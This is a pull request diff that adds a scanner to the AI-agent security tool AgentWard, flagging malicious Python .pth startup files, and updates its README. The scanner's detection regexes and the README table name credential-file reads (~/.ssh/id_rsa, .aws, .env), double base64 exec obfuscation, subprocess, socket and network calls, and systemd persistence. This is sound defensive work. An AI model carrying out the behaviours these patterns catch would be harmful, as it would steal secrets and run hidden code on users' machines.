### PR TITLE
feat: add .pth file supply chain scanner and README updates

### DIFF
--- a/README.md
+++ b/README.md
@@ -33,6 +33,7 @@ AI agents now have access to your email, calendar, filesystem, shell, databases,
 | What exists today | What it does | What it doesn't do |
 |---|---|---|
 | **Static scanners** (mcp-scan, Cisco Skill Scanner) | Scan tool definitions, report risks | No runtime enforcement. Scan and walk away. |
+| **Package scanners** (Snyk, Socket) | Flag known-vulnerable packages | Don't inspect .pth files or install-time code execution vectors. |
 | **Guardrails frameworks** (NeMo, Guardrails AI) | Filter LLM inputs/outputs | Don't touch tool calls. An agent can still `rm -rf /`. |
 | **Prompt-based rules** (SecureClaw) | Inject safety instructions into agent context | Vulnerable to prompt injection. The LLM can be tricked into ignoring them. |
 | **IAM / OAuth** | Control who can access what | Control *humans*, not *agents*. An agent with your OAuth token has your full permissions. |
@@ -62,8 +63,17 @@ agentward init
 
 That's it. `agentward init` scans your tools, shows a risk summary, generates a recommended policy, and wires AgentWard into your environment. Most users don't need anything else.
 
-If you want more control, you can run each step individually:
+If you want more control, you can run each step individually. AgentWard follows a five-step security lifecycle:
 
+```
+SCAN → CONFIGURE → ENFORCE → VERIFY → MONITOR
+```
+
+- **SCAN** — discover tools, classify risk, detect supply chain threats before runtime
+- **CONFIGURE** — generate a policy tailored to what scan found
+- **ENFORCE** — run the proxy; every tool call evaluated against policy in code
+- **VERIFY** — fire adversarial probes through the engine, confirm policies block what they should
+- **MONITOR** — audit trail in JSON Lines and RFC 5424 syslog for SIEM integration
 
 #### 1. Scan your tools
 
@@ -73,12 +83,13 @@ agentward scan
 
 Auto-discovers MCP configs (Claude Desktop, Cursor, Windsurf, VS Code), Python tool definitions (OpenAI, LangChain, CrewAI), and OpenClaw skills. Outputs a permission map with risk ratings, skill chain analysis, security recommendations, and developer fix guidance. A markdown report (`agentward-report.md`) is saved automatically.
 
-The scanner also runs **pre-install security checks** on skill directories before you install them:
+The scanner also runs **pre-install security checks** on skill directories before you install them — catching threats at the supply chain stage, before they can execute code at runtime:
 
 - **Deserialization attack detection** (CRITICAL) — identifies `pickle.loads`, `yaml.load`, Java deserialization, and PHP `unserialize` calls that can execute arbitrary code when the skill processes agent-controlled input
 - **YAML safety analysis** — flags `yaml.load` without `Loader=` and bare `yaml.unsafe_load` calls
-- **Executable hook inspection** — checks `postinstall`, `preinstall`, and lifecycle scripts for suspicious shell commands
+- **Executable hook inspection** — checks `postinstall`, `preinstall`, and lifecycle scripts for suspicious shell commands (ClawHavoc-style install-time code execution)
 - **Dependency analysis** — detects typosquatting candidates and known-malicious package names
+- **.pth file scanning** (`--scan-site-packages`) — scans Python site-packages directories for malicious `.pth` files that execute code at interpreter startup; see [Supply Chain: .pth File Scanner](#supply-chain-pth-file-scanner)
 
 ```bash
 agentward scan ./my-downloaded-skill/    # pre-install check before installing
@@ -90,6 +101,8 @@ agentward scan ~/.cursor/mcp.json             # scan specific MCP config
 agentward scan ~/project/                     # scan directory
 agentward scan --format html                  # shareable HTML report with security score
 agentward scan --format sarif                 # SARIF output for GitHub Security tab
+agentward scan --scan-site-packages           # also scan .pth files in site-packages
+agentward scan --skip-site-packages           # skip .pth scanning
 ```
 
 #### 2. Generate a policy
@@ -170,7 +183,29 @@ Every tool call is now intercepted, evaluated against your policy, and either al
  [APPROVE] gmail.send_email            → waiting for human approval
 ```
 
-#### 5. Visualize your permission graph
+#### 5. Verify your policy
+
+```bash
+agentward probe --policy agentward.yaml
+```
+
+Fires adversarial tool calls through the live policy engine and reports which attack categories your policy correctly blocks. Catches policy drift before it reaches production — rules get relaxed, new skills get added without policy entries, and suddenly dangerous tools are allowed.
+
+```
+  Category                  Total  Pass  Fail  Gap  Coverage
+  ─────────────────────────────────────────────────────────
+  protected_paths              14    14     0    0   ████████ 100%
+  path_traversal                7     7     0    0   ████████ 100%
+  privilege_escalation          9     0     0    9   ░░░░░░░░   0%
+```
+
+```bash
+agentward probe --severity critical           # only critical probes (fast CI check)
+agentward probe --strict                      # exit 1 on any FAIL or GAP
+agentward probe --list                        # show all 68 built-in probes
+```
+
+#### 6. Visualize your permission graph
 
 ```bash
 agentward map                                   # terminal visualization
@@ -180,7 +215,7 @@ agentward map --format mermaid -o graph.md      # export as Mermaid diagram
 
 Shows servers, tools, data access types, risk levels, and detected skill chains. With `--policy`, overlays ALLOW/BLOCK/APPROVE decisions on the graph.
 
-#### 6. Review audit trail
+#### 8. Review audit trail
 
 ```bash
 agentward audit                                # read default log (agentward-audit.jsonl)
@@ -193,7 +228,7 @@ agentward audit --json                         # machine-readable output
 
 Shows summary stats, decision breakdowns (ALLOW/BLOCK/APPROVE counts), top tools, chain violations, and optionally a chronological timeline.
 
-#### 7. Enterprise SIEM integration
+#### 9. Enterprise SIEM integration
 
 AgentWard writes every audit event in **two formats simultaneously**:
 
@@ -227,7 +262,7 @@ audit:
   syslog_path: /var/log/agentward/audit.syslog   # default: alongside the JSONL file
 ```
 
-#### 8. Compare policy changes
+#### 10. Compare policy changes
 
 ```bash
 agentward diff old.yaml new.yaml               # rich diff output
@@ -755,6 +790,36 @@ Example GitHub Actions step:
 
 The `protected_paths` category always passes — it tests the non-overridable safety floor that runs before policy evaluation, regardless of what's in `agentward.yaml`. If these ever fail, the safety floor has been bypassed.
 
+## Supply Chain: .pth File Scanner
+
+Python's `.pth` mechanism executes any line starting with `import` in every `.pth` file in `site-packages` at interpreter startup — before any user code runs. In March 2026, the `litellm` package was compromised via a `litellm_init.pth` file that used double-encoded base64 to execute a malicious payload silently on every Python invocation.
+
+AgentWard scans site-packages directories for `.pth` files that contain suspicious executable content.
+
+```bash
+agentward scan --scan-site-packages          # include .pth scanning
+agentward scan --skip-site-packages          # skip .pth scanning
+```
+
+**What it checks:**
+
+| Pattern | Severity | Example |
+|---------|----------|---------|
+| Double base64 decode (litellm attack) | CRITICAL | `exec(b64decode(b64decode(...)))` |
+| Any base64/binary decode | CRITICAL | `base64.b64decode(...)` |
+| Subprocess execution | CRITICAL | `subprocess.Popen([...])` |
+| OS command execution | CRITICAL | `os.system(...)`, `os.popen(...)` |
+| `eval` / `exec` / `compile` | CRITICAL | `eval(open(...).read())` |
+| Network calls | CRITICAL | `urllib.urlopen(...)`, `requests.get(...)`, `socket.connect(...)` |
+| Sensitive file reads | CRITICAL | `open('~/.ssh/id_rsa')` |
+| Binary content | CRITICAL | Non-printable bytes >5% of file |
+| Oversized file (>1MB) | CRITICAL | Anomalously large .pth file |
+| Unknown executable import | WARNING | Any `import` line not on the allowlist |
+
+**Allowlist:** Known-good files (`distutils-precedence.pth`, editable installs `__editable__*.pth`, namespace packages `*-nspkg.pth`, pytest enabler, etc.) are checked against expected content patterns and skipped if they match. The allowlist is shipped with AgentWard and can be extended in the source.
+
+Findings appear in the terminal output, markdown report, HTML report, and SARIF output. A CRITICAL `.pth` finding is included as a SARIF `error`-level result.
+
 ## What AgentWard Is NOT
 
 - **Not a static scanner** — Scanners like mcp-scan analyze and walk away. AgentWard scans *and* enforces at runtime.
@@ -804,7 +869,7 @@ AgentWard is early-stage software. We're being upfront about what works well and
 
 **Tested end-to-end and working well:**
 - `agentward init` — one-command scan, policy generation, and environment wiring (macOS)
-- `agentward scan` — static analysis across MCP configs, Python tools, and OpenClaw skills (macOS)
+- `agentward scan` — static analysis across MCP configs, Python tools, and OpenClaw skills (macOS); `.pth` supply chain scanner (59 tests)
 - `agentward configure` — policy YAML generation from scan results
 - `agentward setup --gateway openclaw` — OpenClaw gateway port swapping + LaunchAgent plist patching
 - `agentward inspect --gateway openclaw` — runtime enforcement of OpenClaw skill calls via LLM API interception (Anthropic provider, streaming mode). This is our most thoroughly tested path.

--- a/agentward/cli.py
+++ b/agentward/cli.py
@@ -773,6 +773,20 @@ def scan(
             help="Output format: 'html' for shareable HTML report, 'sarif' for GitHub Security (CI).",
         ),
     ] = None,
+    scan_site_packages: Annotated[
+        bool,
+        typer.Option(
+            "--scan-site-packages",
+            help="Scan site-packages directories for malicious .pth files (supply chain detection).",
+        ),
+    ] = False,
+    skip_site_packages: Annotated[
+        bool,
+        typer.Option(
+            "--skip-site-packages",
+            help="Skip .pth file scanning even if included by default.",
+        ),
+    ] = False,
 ) -> None:
     """Scan MCP configs, Python codebases, and OpenClaw skills for tool definitions.
 
@@ -790,6 +804,8 @@ def scan(
       agentward scan --json > report.json               # machine-readable output
       agentward scan --format html                      # shareable HTML report
       agentward scan --format sarif                     # SARIF for GitHub Security tab
+      agentward scan --scan-site-packages               # also scan .pth files in site-packages
+      agentward scan --skip-site-packages               # skip .pth scanning
     """
     from agentward.scan.report import (
         generate_scan_markdown,
@@ -798,6 +814,34 @@ def scan(
     )
 
     scan_result, recommendations, _config_paths, chains = _run_scan(target, timeout, _console)
+
+    # .pth supply chain scanning
+    if scan_site_packages and not skip_site_packages:
+        from agentward.scan.pth_scanner import scan_pth_files
+
+        _console.print(
+            "[bold #5eead4]⚡[/bold #5eead4] Scanning site-packages for malicious .pth files...",
+            highlight=False,
+        )
+        pth_result = scan_pth_files()
+        scan_result.pth_result = pth_result
+        if pth_result.has_critical:
+            _console.print(
+                f"[bold #ff3366]🔴 CRITICAL:[/bold #ff3366] {sum(1 for f in pth_result.findings if f.severity == 'CRITICAL')} "
+                "malicious .pth finding(s) — see report for details.",
+                highlight=False,
+            )
+        elif pth_result.has_warning:
+            _console.print(
+                f"[#ffcc00]⚠ WARNING:[/#ffcc00] {sum(1 for f in pth_result.findings if f.severity == 'WARNING')} "
+                ".pth finding(s) — see report for details.",
+                highlight=False,
+            )
+        else:
+            _console.print(
+                f"[#00ff88]✓[/#00ff88] {pth_result.files_scanned} .pth file(s) scanned — no suspicious content found.",
+                highlight=False,
+            )
 
     if output_json:
         output_console = Console()

--- a/agentward/scan/permissions.py
+++ b/agentward/scan/permissions.py
@@ -84,6 +84,9 @@ class ScanResult(BaseModel):
     servers: list[ServerPermissionMap] = Field(default_factory=list)
     config_sources: list[str] = Field(default_factory=list)
     scan_timestamp: str = ""
+    # .pth supply chain scan results (present when --scan-site-packages is used
+    # or when site-packages scanning is included in the default scan)
+    pth_result: Any | None = None
 
 
 # --- Schema property name patterns for data access classification ---

--- a/agentward/scan/pth_scanner.py
+++ b/agentward/scan/pth_scanner.py
@@ -1,0 +1,545 @@
+"""Supply chain attack scanner for Python .pth files.
+
+.pth files in site-packages directories can execute arbitrary Python code at
+interpreter startup — any line starting with 'import' is executed immediately
+when the interpreter starts. This mechanism was exploited in the March 2026
+litellm supply chain attack (litellm_init.pth), which used double-encoded
+base64 to obfuscate a malicious payload.
+
+This scanner:
+- Locates all site-packages directories (system, user, active venv)
+- Reads every .pth file safely (no execution)
+- Detects suspicious patterns using regex
+- Cross-references against a known-good allowlist
+- Reports findings with CRITICAL / WARNING / OK severity
+"""
+
+from __future__ import annotations
+
+import re
+import site
+import sysconfig
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Literal
+
+
+# ---------------------------------------------------------------------------
+# Data models
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class PthFinding:
+    """A finding from .pth file analysis."""
+
+    severity: Literal["CRITICAL", "WARNING", "OK"]
+    file: str          # absolute path to the .pth file
+    line_number: int | None  # 1-based; None for file-level findings
+    pattern: str       # rule name that triggered
+    evidence: str      # the triggering line (truncated for safety)
+    description: str
+
+
+@dataclass
+class PthScanResult:
+    """Results of scanning .pth files across site-packages dirs."""
+
+    findings: list[PthFinding] = field(default_factory=list)
+    files_scanned: int = 0
+    site_packages_dirs: list[str] = field(default_factory=list)
+    errors: list[str] = field(default_factory=list)
+
+    @property
+    def has_critical(self) -> bool:
+        return any(f.severity == "CRITICAL" for f in self.findings)
+
+    @property
+    def has_warning(self) -> bool:
+        return any(f.severity == "WARNING" for f in self.findings)
+
+
+# ---------------------------------------------------------------------------
+# Allowlist of known-good .pth files
+# ---------------------------------------------------------------------------
+# Maps filename (exact match) to a list of acceptable content patterns.
+# A file matches the allowlist if ALL of its executable lines match at least
+# one acceptable pattern.  Non-executable lines (bare paths, blank lines,
+# comments) are never flagged.
+#
+# Pattern strings are matched with re.search() against each executable line.
+
+_KNOWN_GOOD_PTH: dict[str, list[str]] = {
+    # setuptools
+    "distutils-precedence.pth": [r"^import\s+_distutils_hack"],
+    "easy-install.pth": [],  # path-only files — no executable content expected
+    # pip / wheel
+    "wheel.pth": [],
+    # editable installs (pip install -e)
+    "__editable__": [r"^import\s+__editable__"],
+    # pytest / testing
+    "pytest-enabler.pth": [r"^import\s+pytest_enabler"],
+    "pytest11.pth": [],
+    # coverage
+    "coverage.pth": [r"^import\s+coverage"],
+    # sitecustomize shims
+    "sitecustomize.pth": [r"^import\s+sitecustomize"],
+    # conda / anaconda
+    "conda.pth": [],
+    "conda-meta.pth": [],
+    # IPython / Jupyter
+    "ipython_genutils-nspkg.pth": [],
+    # pydev debugger (PyCharm, VS Code)
+    "pydev.pth": [r"^import\s+pydev"],
+    "pydebugger.pth": [],
+    # common virtualenv helpers
+    "virtualenv_path_extensions.pth": [],
+    "site.pth": [],
+    # Apple system Python extras
+    "Apple.pth": [],
+}
+
+# Filename substrings that are typically safe (editable installs)
+_SAFE_FILENAME_SUBSTRINGS: tuple[str, ...] = (
+    "__editable__",
+    "_mutable_package_",
+    "-nspkg.pth",
+    "-editable.pth",
+)
+
+
+# ---------------------------------------------------------------------------
+# Suspicious pattern definitions
+# ---------------------------------------------------------------------------
+# Each entry: (rule_name, severity, compiled_regex, description)
+
+_SUSPICIOUS_PATTERNS: list[tuple[str, Literal["CRITICAL", "WARNING"], re.Pattern[str], str]] = [
+    # Double/chained base64 (litellm attack signature)
+    (
+        "double_base64_decode",
+        "CRITICAL",
+        re.compile(r"b64decode.*b64decode|base64.*base64", re.IGNORECASE),
+        "Double base64 decoding — obfuscation technique used in supply chain attacks",
+    ),
+    # Any base64 decode in an executable line
+    (
+        "base64_decode",
+        "CRITICAL",
+        re.compile(r"b64decode|b32decode|b16decode|decodebytes", re.IGNORECASE),
+        "Base64/binary decoding in .pth startup code — common obfuscation vector",
+    ),
+    # Subprocess execution
+    (
+        "subprocess_exec",
+        "CRITICAL",
+        re.compile(r"subprocess\s*\.\s*(Popen|run|call|check_output|check_call|getoutput)", re.IGNORECASE),
+        "Subprocess execution at interpreter startup",
+    ),
+    # os.system / os.exec family / os.popen
+    (
+        "os_exec",
+        "CRITICAL",
+        re.compile(r"os\s*\.\s*(system|execv|execve|execvp|execvpe|popen|spawn)", re.IGNORECASE),
+        "OS command execution at interpreter startup",
+    ),
+    # eval / exec (obfuscated code execution)
+    (
+        "eval_exec",
+        "CRITICAL",
+        re.compile(r"\beval\s*\(|\bexec\s*\(|\bcompile\s*\(", re.IGNORECASE),
+        "Dynamic code execution (eval/exec/compile) in .pth startup code",
+    ),
+    # __import__ with non-trivial arg (dynamic import obfuscation)
+    (
+        "dynamic_import",
+        "CRITICAL",
+        re.compile(r"__import__\s*\([^)]{5,}", re.IGNORECASE),
+        "Dynamic __import__() call — obfuscation technique",
+    ),
+    # Network calls — urllib
+    (
+        "network_urllib",
+        "CRITICAL",
+        re.compile(r"urllib\s*\.\s*(request|parse|urlopen)|urlopen\s*\(", re.IGNORECASE),
+        "Network call via urllib at interpreter startup",
+    ),
+    # Network calls — requests
+    (
+        "network_requests",
+        "CRITICAL",
+        re.compile(r"\brequests\s*\.\s*(get|post|put|delete|head|session|Session)", re.IGNORECASE),
+        "Network call via requests library at interpreter startup",
+    ),
+    # Network calls — http.client
+    (
+        "network_http_client",
+        "CRITICAL",
+        re.compile(r"http\.client|HTTPConnection|HTTPSConnection", re.IGNORECASE),
+        "Network call via http.client at interpreter startup",
+    ),
+    # Network calls — socket
+    (
+        "network_socket",
+        "CRITICAL",
+        re.compile(r"\bsocket\s*\.\s*(connect|create_connection|socket\s*\()", re.IGNORECASE),
+        "Raw socket connection at interpreter startup",
+    ),
+    # Read sensitive files
+    (
+        "sensitive_file_read",
+        "CRITICAL",
+        re.compile(
+            r"""open\s*\([^)]*(?:\.ssh|\.aws|\.kube|\.env|\.pem|id_rsa|id_ed25519|credentials|secrets)""",
+            re.IGNORECASE,
+        ),
+        "Reading a sensitive file path (~/.ssh, ~/.aws, ~/.kube, .env, .pem) at startup",
+    ),
+    # Writes to systemd dirs
+    (
+        "systemd_write",
+        "CRITICAL",
+        re.compile(r"""(?:/etc/systemd|/lib/systemd|/usr/lib/systemd|/run/systemd)""", re.IGNORECASE),
+        "Reference to systemd directory — potential persistence mechanism",
+    ),
+    # getattr with dynamic/string args (attribute obfuscation)
+    (
+        "dynamic_getattr",
+        "CRITICAL",
+        re.compile(r"getattr\s*\([^,]+,\s*['\"][^'\"]+['\"].*\)\s*\(", re.IGNORECASE),
+        "getattr() with dynamic attribute string followed by call — obfuscation technique",
+    ),
+    # Any other import line (executable but not on allowlist) — WARNING
+    # This is the catch-all: any 'import ...' line that didn't match CRITICAL patterns
+    (
+        "executable_import",
+        "WARNING",
+        re.compile(r"^import\s+\S+"),
+        "Executable import line — runs at interpreter startup (verify this is expected)",
+    ),
+]
+
+# Max file size to analyze (bytes). Files larger than this are flagged CRITICAL.
+_MAX_FILE_SIZE = 1024 * 1024  # 1 MB
+
+
+# ---------------------------------------------------------------------------
+# Site-packages discovery
+# ---------------------------------------------------------------------------
+
+
+def _find_site_packages_dirs() -> list[Path]:
+    """Return all site-packages directories to scan.
+
+    Checks:
+    - site.getsitepackages() (system/venv site-packages)
+    - site.getusersitepackages() (user site)
+    - sysconfig purelib / platlib paths
+    - VIRTUAL_ENV / CONDA_PREFIX env vars for active virtual envs
+
+    Deduplicates and returns only directories that actually exist.
+    """
+    import os
+
+    candidates: list[Path] = []
+
+    # Standard site-packages
+    try:
+        for p in site.getsitepackages():
+            candidates.append(Path(p))
+    except AttributeError:
+        # Some minimal Python environments don't have getsitepackages()
+        pass
+
+    # User site-packages
+    try:
+        user_site = site.getusersitepackages()
+        if user_site:
+            candidates.append(Path(user_site))
+    except AttributeError:
+        pass
+
+    # sysconfig paths
+    for scheme_key in ("purelib", "platlib"):
+        try:
+            p = sysconfig.get_path(scheme_key)
+            if p:
+                candidates.append(Path(p))
+        except Exception:
+            pass
+
+    # Active virtual environment
+    for env_var in ("VIRTUAL_ENV", "CONDA_PREFIX"):
+        venv = os.environ.get(env_var)
+        if venv:
+            venv_path = Path(venv)
+            # Common layouts
+            for sub in ("lib", "Lib"):
+                lib_dir = venv_path / sub
+                if lib_dir.is_dir():
+                    for child in lib_dir.iterdir():
+                        if child.name.startswith("python") and child.is_dir():
+                            sp = child / "site-packages"
+                            if sp.is_dir():
+                                candidates.append(sp)
+                    # Windows: Lib/site-packages directly
+                    sp = lib_dir / "site-packages"
+                    if sp.is_dir():
+                        candidates.append(sp)
+
+    # Deduplicate (resolve symlinks)
+    seen: set[Path] = set()
+    result: list[Path] = []
+    for p in candidates:
+        try:
+            rp = p.resolve()
+            if rp not in seen and rp.is_dir():
+                seen.add(rp)
+                result.append(rp)
+        except (OSError, PermissionError):
+            pass
+
+    return result
+
+
+# ---------------------------------------------------------------------------
+# .pth file analysis
+# ---------------------------------------------------------------------------
+
+
+def _is_allowlisted(filename: str, executable_lines: list[tuple[int, str]]) -> bool:
+    """Return True if the file is fully covered by the known-good allowlist.
+
+    A file is allowlisted if any of:
+    1. Its filename contains a safe substring (e.g. __editable__, -nspkg.pth)
+       — these are always safe regardless of content.
+    2. Its filename matches an entry in _KNOWN_GOOD_PTH AND every executable
+       line matches at least one allowed pattern for that entry.
+
+    Empty allowlist patterns in _KNOWN_GOOD_PTH mean "no executable content
+    expected" — any executable line in such a file is NOT allowlisted via rule 2
+    (but could still be caught by rule 1 if the filename has a safe substring).
+    """
+    # Rule 1: Safe filename substrings take priority — no content analysis needed
+    for substr in _SAFE_FILENAME_SUBSTRINGS:
+        if substr in filename:
+            return True
+
+    # Rule 2: Exact filename match with pattern verification
+    if filename in _KNOWN_GOOD_PTH:
+        allowed_patterns = _KNOWN_GOOD_PTH[filename]
+        if not allowed_patterns:
+            # File is known-good only if it has no executable lines
+            return len(executable_lines) == 0
+        for _lineno, line in executable_lines:
+            if not any(re.search(pat, line) for pat in allowed_patterns):
+                return False
+        return True
+
+    return False
+
+
+def _analyze_pth_file(path: Path) -> list[PthFinding]:
+    """Analyze a single .pth file for suspicious content.
+
+    Returns a list of PthFinding objects. Empty list means the file is clean.
+
+    .pth file rules (CPython implementation):
+    - Lines starting with '#' are comments (ignored)
+    - Blank lines are ignored
+    - Lines starting with 'import ' are executed as Python code
+    - All other lines are treated as path additions (not executed)
+    """
+    findings: list[PthFinding] = []
+    abs_path = str(path)
+
+    # --- File-level checks ---
+
+    # Size check
+    try:
+        size = path.stat().st_size
+    except OSError as e:
+        findings.append(PthFinding(
+            severity="WARNING",
+            file=abs_path,
+            line_number=None,
+            pattern="stat_error",
+            evidence="",
+            description=f"Cannot stat file: {e}",
+        ))
+        return findings
+
+    if size == 0:
+        return findings  # empty .pth is harmless
+
+    if size > _MAX_FILE_SIZE:
+        findings.append(PthFinding(
+            severity="CRITICAL",
+            file=abs_path,
+            line_number=None,
+            pattern="oversized_file",
+            evidence=f"{size:,} bytes",
+            description=f"File is {size:,} bytes (>{_MAX_FILE_SIZE:,}) — suspiciously large for a .pth file",
+        ))
+
+    # Read content
+    try:
+        raw = path.read_bytes()
+    except PermissionError:
+        findings.append(PthFinding(
+            severity="WARNING",
+            file=abs_path,
+            line_number=None,
+            pattern="permission_denied",
+            evidence="",
+            description="Permission denied reading file",
+        ))
+        return findings
+    except OSError as e:
+        findings.append(PthFinding(
+            severity="WARNING",
+            file=abs_path,
+            line_number=None,
+            pattern="read_error",
+            evidence="",
+            description=f"Cannot read file: {e}",
+        ))
+        return findings
+
+    # Binary content check — .pth files should be plain text.
+    # Must run on raw bytes regardless of whether UTF-8 decode succeeds
+    # (NUL bytes are valid UTF-8 but not valid .pth content).
+    non_printable = sum(1 for b in raw if b < 0x09 or (0x0D < b < 0x20) or b == 0x7F)
+    if non_printable > len(raw) * 0.05:
+        findings.append(PthFinding(
+            severity="CRITICAL",
+            file=abs_path,
+            line_number=None,
+            pattern="binary_content",
+            evidence=f"{non_printable} non-printable bytes ({non_printable / len(raw) * 100:.0f}%)",
+            description="Binary content in .pth file — only plain text is expected",
+        ))
+        return findings
+
+    try:
+        text = raw.decode("utf-8")
+    except UnicodeDecodeError:
+        try:
+            text = raw.decode("latin-1")
+        except Exception:
+            findings.append(PthFinding(
+                severity="CRITICAL",
+                file=abs_path,
+                line_number=None,
+                pattern="binary_content",
+                evidence="",
+                description="Cannot decode file as text — binary content in .pth file",
+            ))
+            return findings
+
+    # --- Line-level analysis ---
+
+    lines = text.splitlines()
+    executable_lines: list[tuple[int, str]] = []  # (1-based lineno, line)
+
+    for lineno, line in enumerate(lines, start=1):
+        stripped = line.strip()
+        if not stripped or stripped.startswith("#"):
+            continue  # blank or comment — ignored by Python
+        if stripped.startswith("import ") or stripped.startswith("import\t"):
+            executable_lines.append((lineno, stripped))
+
+    if not executable_lines:
+        # Path-only file: verify paths exist (but don't flag missing — just note)
+        return findings
+
+    # Check allowlist first
+    if _is_allowlisted(path.name, executable_lines):
+        return findings  # all lines are known-good
+
+    # Apply suspicious pattern checks to each executable line
+    for lineno, line in executable_lines:
+        evidence = line[:200]  # cap evidence length
+
+        matched_critical = False
+        for rule_name, severity, pattern, description in _SUSPICIOUS_PATTERNS:
+            if severity != "CRITICAL":
+                continue
+            if pattern.search(line):
+                findings.append(PthFinding(
+                    severity="CRITICAL",
+                    file=abs_path,
+                    line_number=lineno,
+                    pattern=rule_name,
+                    evidence=evidence,
+                    description=description,
+                ))
+                matched_critical = True
+                break  # report first CRITICAL hit per line
+
+        if not matched_critical:
+            # Executable line but no critical pattern — report WARNING
+            findings.append(PthFinding(
+                severity="WARNING",
+                file=abs_path,
+                line_number=lineno,
+                pattern="executable_import",
+                evidence=evidence,
+                description=(
+                    f"Executable 'import' line in {path.name} — runs at interpreter startup. "
+                    "Verify this is expected for this package."
+                ),
+            ))
+
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# Public scanner entrypoint
+# ---------------------------------------------------------------------------
+
+
+def scan_pth_files(
+    extra_dirs: list[Path] | None = None,
+) -> PthScanResult:
+    """Scan site-packages directories for suspicious .pth files.
+
+    Args:
+        extra_dirs: Additional directories to scan beyond the auto-discovered
+                    site-packages directories.
+
+    Returns:
+        PthScanResult with findings, file count, and directory list.
+    """
+    result = PthScanResult()
+
+    dirs_to_scan = _find_site_packages_dirs()
+    if extra_dirs:
+        for d in extra_dirs:
+            try:
+                rp = d.resolve()
+                if rp not in {Path(x).resolve() for x in result.site_packages_dirs}:
+                    dirs_to_scan.append(rp)
+            except OSError:
+                pass
+
+    result.site_packages_dirs = [str(d) for d in dirs_to_scan]
+
+    for sp_dir in dirs_to_scan:
+        try:
+            pth_files = sorted(sp_dir.glob("*.pth"))
+        except PermissionError:
+            result.errors.append(f"Permission denied listing {sp_dir}")
+            continue
+        except OSError as e:
+            result.errors.append(f"Cannot read {sp_dir}: {e}")
+            continue
+
+        for pth_path in pth_files:
+            result.files_scanned += 1
+            try:
+                file_findings = _analyze_pth_file(pth_path)
+                result.findings.extend(file_findings)
+            except Exception as e:  # pragma: no cover — unexpected errors
+                result.errors.append(f"Unexpected error analyzing {pth_path}: {e}")
+
+    return result

--- a/agentward/scan/report.py
+++ b/agentward/scan/report.py
@@ -130,6 +130,10 @@ def print_scan_report(
     if recommendations:
         _print_recommendations(recommendations, scan, console)
 
+    # .pth supply chain findings
+    if scan.pth_result is not None:
+        _print_pth_findings(scan.pth_result, console)
+
     console.print()
 
 
@@ -357,6 +361,46 @@ def generate_scan_markdown(
                 lines.append(f"**Issue:** {reason}  ")
                 lines.append(f"**Fix:** {fix}")
                 lines.append("")
+        lines.append("")
+
+    # .pth supply chain findings
+    if scan.pth_result is not None:
+        pth = scan.pth_result
+        lines.append("## Supply Chain: .pth File Scan")
+        lines.append("")
+        lines.append(f"**Site-packages directories scanned:** {len(pth.site_packages_dirs)}  ")
+        lines.append(f"**Files scanned:** {pth.files_scanned}")
+        lines.append("")
+
+        if not pth.findings:
+            lines.append("✅ No suspicious .pth files found.")
+        else:
+            _pth_sev_label = {"CRITICAL": "🔴 CRITICAL", "WARNING": "⚠️ WARNING", "OK": "✅ OK"}
+            pth_rows: list[tuple[str, str, str, str]] = []
+            for f in pth.findings:
+                import os
+                fname = os.path.basename(f.file)
+                lineno = str(f.line_number) if f.line_number else "—"
+                pth_rows.append((_pth_sev_label.get(f.severity, f.severity), fname, lineno, f.description))
+
+            pth_headers = ("Severity", "File", "Line", "Description")
+            pth_widths = [len(h) for h in pth_headers]
+            for row in pth_rows:
+                for i, cell in enumerate(row):
+                    pth_widths[i] = max(pth_widths[i], len(cell))
+
+            def _pth_row(cells: tuple[str, ...]) -> str:
+                parts = [cell.ljust(pth_widths[i]) for i, cell in enumerate(cells)]
+                return "| " + " | ".join(parts) + " |"
+
+            def _pth_sep() -> str:
+                return "| " + " | ".join("-" * w for w in pth_widths) + " |"
+
+            lines.append(_pth_row(pth_headers))
+            lines.append(_pth_sep())
+            for row in pth_rows:
+                lines.append(_pth_row(row))
+
         lines.append("")
 
     # Footer
@@ -705,6 +749,61 @@ def _print_chain_analysis(
             )
         console.print(f"  {desc}", style=_CLR_DIM)
         console.print()
+
+
+# ---------------------------------------------------------------------------
+# .pth supply chain findings
+# ---------------------------------------------------------------------------
+
+
+def _print_pth_findings(pth_result: Any, console: Console) -> None:
+    """Print .pth scan findings to the console.
+
+    Args:
+        pth_result: PthScanResult instance.
+        console: Rich console.
+    """
+    from agentward.scan.pth_scanner import PthFinding
+
+    findings: list[PthFinding] = pth_result.findings
+
+    console.print(
+        f"[bold {_CLR_CYAN}]Supply Chain: .pth File Scan[/bold {_CLR_CYAN}]  "
+        f"[{_CLR_DIM}]{pth_result.files_scanned} file(s) across {len(pth_result.site_packages_dirs)} dir(s)[/{_CLR_DIM}]"
+    )
+
+    if not findings:
+        console.print(f"  [{_CLR_LOW}]✓ No suspicious .pth files found[/{_CLR_LOW}]")
+        console.print()
+        return
+
+    _pth_colors = {"CRITICAL": _CLR_CRITICAL, "WARNING": _CLR_MEDIUM, "OK": _CLR_LOW}
+    _pth_badges = {"CRITICAL": "🔴", "WARNING": "⚠", "OK": "✓"}
+
+    import os
+
+    rows: list[tuple[str, str, str, str]] = []
+    for f in findings:
+        fname = os.path.basename(f.file)
+        lineno = str(f.line_number) if f.line_number else "—"
+        badge = _pth_badges.get(f.severity, "?")
+        sev_label = f"{badge} {f.severity}"
+        rows.append((sev_label, fname, lineno, f.description[:80]))
+
+    for row in rows:
+        sev = row[0]
+        fname = row[1]
+        lineno = row[2]
+        desc = row[3]
+        # Determine color from severity label
+        clr = _CLR_CRITICAL if "CRITICAL" in sev else _CLR_MEDIUM if "WARNING" in sev else _CLR_LOW
+        console.print(
+            f"  [{clr}]{sev}[/{clr}] [{_CLR_CYAN}]{fname}[/{_CLR_CYAN}]"
+            f"[{_CLR_DIM}]:{lineno}[/{_CLR_DIM}]  {desc}",
+            highlight=False,
+        )
+
+    console.print()
 
 
 # ---------------------------------------------------------------------------

--- a/agentward/scan/sarif_report.py
+++ b/agentward/scan/sarif_report.py
@@ -169,6 +169,48 @@ def generate_sarif(
             }],
         })
 
+    # --- .pth supply chain results ---
+    if scan.pth_result is not None:
+        _pth_sarif_level = {"CRITICAL": "error", "WARNING": "warning", "OK": "note"}
+        for pth_finding in scan.pth_result.findings:
+            if pth_finding.severity == "OK":
+                continue
+            rule_id = f"agentward/pth/{pth_finding.pattern}"
+            if rule_id not in rule_ids:
+                rule_ids.add(rule_id)
+                rules.append({
+                    "id": rule_id,
